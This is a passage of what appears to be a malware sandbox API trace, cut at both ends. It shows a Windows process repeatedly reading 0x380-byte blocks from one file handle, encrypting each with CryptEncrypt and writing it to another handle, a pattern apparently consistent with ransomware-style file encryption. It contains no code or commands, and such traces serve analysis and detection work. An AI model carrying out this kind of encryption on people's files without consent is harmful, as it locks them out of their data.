(in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.291] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.291] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.292] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.292] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.292] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.292] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.292] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.292] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.292] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.292] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.292] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.292] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.292] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.292] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.293] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.293] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.293] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.293] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.293] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.293] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.293] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.293] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.293] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.293] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.293] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.293] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.293] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.293] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.294] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.294] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.294] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.294] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.294] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.294] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.294] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.294] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.294] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.294] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.294] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.294] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.294] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.295] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.295] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.295] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.295] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.295] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.295] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.295] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.295] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.295] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.295] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.295] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.295] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.296] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.296] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.296] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.296] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.296] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.296] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.296] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.296] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.296] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.296] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.297] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.297] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.297] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.297] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.297] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.297] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.297] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.297] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.297] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.297] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.297] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.297] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.298] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.298] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.298] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.298] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.298] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.298] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.298] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.298] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.298] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.298] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.298] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.298] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.299] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.299] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.299] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.299] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.299] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.299] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.299] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.299] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.299] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.299] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, 